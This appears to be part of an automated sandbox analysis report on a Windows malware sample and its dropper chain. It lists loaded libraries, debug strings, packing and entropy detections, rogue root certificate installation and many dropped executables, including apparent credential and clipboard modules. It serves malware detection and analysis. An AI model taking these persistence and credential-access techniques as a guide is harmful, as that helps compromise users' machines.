Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1CMweaqlKp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 1CMweaqlKp.exe Static file information: File size 1793040 > 1048576
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: 1CMweaqlKp.exe Static PE information: Raw size of .boot is bigger than: 0x100000 < 0x185000
Source: Binary string: freebl3.pdb source: freebl3[1].dll.51.dr
Source: Binary string: C:\wutimosolix_62\gowaj\tosusinana-la.pdb source: ISetup8.exe, 00000029.00000003.2151074345.0000000003871000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000000.2149099984.0000000000412000.00000002.00000001.01000000.0000001F.sdmp
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.51.dr
Source: Binary string: C:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: file300un.PDBI: source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: Croco.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: YC:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: ,C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: pC:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb4 source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: GC:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: System.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdb source: WERA6A7.tmp.dmp.34.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Unpacked PE file: 7.2.amert.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Unpacked PE file: 9.2.d361f35322.exe.7e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Unpacked PE file: 11.2.explorha.exe.930000.0.unpack :EW;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;avcjhwxy:EW;nkwkrymv:EW;.taggant:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 27.2.MPGPH131.exe.700000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Unpacked PE file: 36.2.d361f35322.exe.7e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 46.2.RageMP131.exe.890000.0.unpack :EW;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;agovwish:EW;lcjgmmfi:EW;.taggant:EW;
Binary contains a suspicious time stamp
Source: jok[1].exe.10.dr Static PE information: 0xFC177629 [Thu Jan 10 08:13:29 2104 UTC]
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .boot
PE file contains an invalid checksum
Source: jok.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x547e4
Source: cred64[1].dll.10.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: swiiiii[1].exe.10.dr Static PE information: real checksum: 0x562fb should be: 0x5eece
Source: sarra[1].exe.1.dr Static PE information: real checksum: 0x255044 should be: 0x255765
Source: amert.exe.1.dr Static PE information: real checksum: 0x1d87f7 should be: 0x1d2e57
Source: clip64.dll.10.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: jok[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x547e4
Source: install.exe.10.dr Static PE information: real checksum: 0x22d33 should be: 0x44be5e
Source: swiiii.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x32780
Source: install[1].exe.10.dr Static PE information: real checksum: 0x22d33 should be: 0x44be5e
Source: cred64.dll.10.dr Static PE information: real checksum: 0x0 should be: 0x147ee8
Source: clip64[1].dll.10.dr Static PE information: real checksum: 0x0 should be: 0x1f783
Source: NewB.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x6bd55
Source: MPGPH131.exe.9.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
Source: explorha.exe.7.dr Static PE information: real checksum: 0x1d87f7 should be: 0x1d2e57
Source: gold.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x9cfd4
Source: swiiii[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x32780
Source: amert[1].exe.1.dr Static PE information: real checksum: 0x1d87f7 should be: 0x1d2e57
Source: RageMP131.exe.9.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
Source: NewB[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x6bd55
Source: d361f35322.exe.1.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
Source: gold[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x9cfd4
Source: alexxxxxxxx.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x2b7dd5
Source: alexxxxxxxx[1].exe.10.dr Static PE information: real checksum: 0x0 should be: 0x2b7dd5
Source: swiiiii.exe.10.dr Static PE information: real checksum: 0x562fb should be: 0x5eece
Source: random[1].exe.1.dr Static PE information: real checksum: 0x24c49c should be: 0x254dd7
PE file contains sections with non-standard names
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name:
Source: 1CMweaqlKp.exe Static PE information: section name: .vm_sec
Source: 1CMweaqlKp.exe Static PE information: section name: .themida
Source: 1CMweaqlKp.exe Static PE information: section name: .boot
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name:
Source: explorta.exe.0.dr Static PE information: section name: .vm_sec
Source: explorta.exe.0.dr Static PE information: section name: .themida
Source: explorta.exe.0.dr Static PE information: section name: .boot
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name: .idata
Source: sarra[1].exe.1.dr Static PE information: section name:
Source: sarra[1].exe.1.dr Static PE information: section name: zhbidvgs
Source: sarra[1].exe.1.dr Static PE information: section name: swmxyxsi
Source: sarra[1].exe.1.dr Static PE information: section name: .taggant
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name: .idata
Source: amert[1].exe.1.dr Static PE information: section name:
Source: amert[1].exe.1.dr Static PE information: section name: avcjhwxy
Source: amert[1].exe.1.dr Static PE information: section name: nkwkrymv
Source: amert[1].exe.1.dr Static PE information: section name: .taggant
Source: amert.exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name: .idata
Source: amert.exe.1.dr Static PE information: section name:
Source: amert.exe.1.dr Static PE information: section name: avcjhwxy
Source: amert.exe.1.dr Static PE information: section name: nkwkrymv
Source: amert.exe.1.dr Static PE information: section name: .taggant
Source: random[1].exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name: .idata
Source: random[1].exe.1.dr Static PE information: section name:
Source: random[1].exe.1.dr Static PE information: section name: agovwish
Source: random[1].exe.1.dr Static PE information: section name: lcjgmmfi
Source: random[1].exe.1.dr Static PE information: section name: .taggant
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name: .idata
Source: d361f35322.exe.1.dr Static PE information: section name:
Source: d361f35322.exe.1.dr Static PE information: section name: agovwish
Source: d361f35322.exe.1.dr Static PE information: section name: lcjgmmfi
Source: d361f35322.exe.1.dr Static PE information: section name: .taggant
Source: explorha.exe.7.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name: .idata
Source: explorha.exe.7.dr Static PE information: section name:
Source: explorha.exe.7.dr Static PE information: section name: avcjhwxy
Source: explorha.exe.7.dr Static PE information: section name: nkwkrymv
Source: explorha.exe.7.dr Static PE information: section name: .taggant
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name: .idata
Source: RageMP131.exe.9.dr Static PE information: section name:
Source: RageMP131.exe.9.dr Static PE information: section name: agovwish
Source: RageMP131.exe.9.dr Static PE information: section name: lcjgmmfi
Source: RageMP131.exe.9.dr Static PE information: section name: .taggant
Source: MPGPH131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name: .idata
Source: MPGPH131.exe.9.dr Static PE information: section name:
Source: MPGPH131.exe.9.dr Static PE information: section name: agovwish
Source: MPGPH131.exe.9.dr Static PE information: section name: lcjgmmfi
Source: MPGPH131.exe.9.dr Static PE information: section name: .taggant
Source: gold[1].exe.10.dr Static PE information: section name: .DAX
Source: gold[1].exe.10.dr Static PE information: section name: .Left
Source: gold[1].exe.10.dr Static PE information: section name: .INV
Source: gold.exe.10.dr Static PE information: section name: .DAX
Source: gold.exe.10.dr Static PE information: section name: .Left
Source: gold.exe.10.dr Static PE information: section name: .INV
Source: cred64[1].dll.10.dr Static PE information: section name: _RDATA
Source: cred64.dll.10.dr Static PE information: section name: _RDATA
Source: alexxxxxxxx[1].exe.10.dr Static PE information: section name: .00cfg
Source: alexxxxxxxx.exe.10.dr Static PE information: section name: .00cfg
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00813F49 push ecx; ret 9_2_00813F5C
Source: 1CMweaqlKp.exe Static PE information: section name: entropy: 7.9986661792698115
Source: 1CMweaqlKp.exe Static PE information: section name: .boot entropy: 7.955810157618839
Source: explorta.exe.0.dr Static PE information: section name: entropy: 7.9986661792698115
Source: explorta.exe.0.dr Static PE information: section name: .boot entropy: 7.955810157618839
Source: sarra[1].exe.1.dr Static PE information: section name: entropy: 7.9243513655231705
Source: sarra[1].exe.1.dr Static PE information: section name: zhbidvgs entropy: 7.912044560062752
Source: amert[1].exe.1.dr Static PE information: section name: entropy: 7.986768487395881
Source: amert[1].exe.1.dr Static PE information: section name: avcjhwxy entropy: 7.953340978521756
Source: amert.exe.1.dr Static PE information: section name: entropy: 7.986768487395881
Source: amert.exe.1.dr Static PE information: section name: avcjhwxy entropy: 7.953340978521756
Source: random[1].exe.1.dr Static PE information: section name: entropy: 7.924280236056968
Source: random[1].exe.1.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: d361f35322.exe.1.dr Static PE information: section name: entropy: 7.924280236056968
Source: d361f35322.exe.1.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: explorha.exe.7.dr Static PE information: section name: entropy: 7.986768487395881
Source: explorha.exe.7.dr Static PE information: section name: avcjhwxy entropy: 7.953340978521756
Source: RageMP131.exe.9.dr Static PE information: section name: entropy: 7.924280236056968
Source: RageMP131.exe.9.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: MPGPH131.exe.9.dr Static PE information: section name: entropy: 7.924280236056968
Source: MPGPH131.exe.9.dr Static PE information: section name: agovwish entropy: 7.911493089854424
Source: swiiiii[1].exe.10.dr Static PE information: section name: .text entropy: 7.992152217310619
Source: swiiiii.exe.10.dr Static PE information: section name: .text entropy: 7.992152217310619
Source: swiiii[1].exe.10.dr Static PE information: section name: .text entropy: 7.987813915261593
Source: swiiii.exe.10.dr Static PE information: section name: .text entropy: 7.987813915261593

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\gX4d2ArXDOHTjofk9CfRb7Jz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\5nFKWr1EKUheiDEHo671vxm8.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\QbkKvIT5uJj3Cx8h0ECIsmUK.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.2\ASUS_WMI.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\gold[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\ISetup8[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jok[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\gPQjkT7jjoMSIv7cXyWMW1C4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\toolspub1[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\oqwWhViccQzmDvkS751EZRiG.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\laQhqKepZhfkS5rQoYOvKJAy.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\g81RdhkO8Pp47pz1l8siHWuN.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\pScZMSZH0uu2OkUDvWpN2tuz.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\dmmb0z6yJ22pC75a4y49Nfob.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\mBoc1pbzy7gOQT20pyEZL3en.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\1NXbTL9dcUCk55eVv5KRJhmL.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\oXA3lyE6zGyLyvw1CwVKpLsf.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\gmHwlMZnGawtAwStcAU6D1RM.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\NN7y6Ml4QHJBCfpeCmt1XQq3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\swiiii[1].exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Pictures\0co9idnjzay1KSn3DMfCsBSw.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\ULDq5mjQ4b5aNI3V4eIJfMVS.exe Jump to dropped file
Source: C:\Users\user\Desktop\1CMweaqlKp.exe File created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File created: C:\Users\user\AppData\Local\Temp\u6po.0.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\GIz2DLitsyoTn14REJti2nqN.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\evHtDP9yDvs3XYDQg8lqEVoH.exe Jump to dropped file
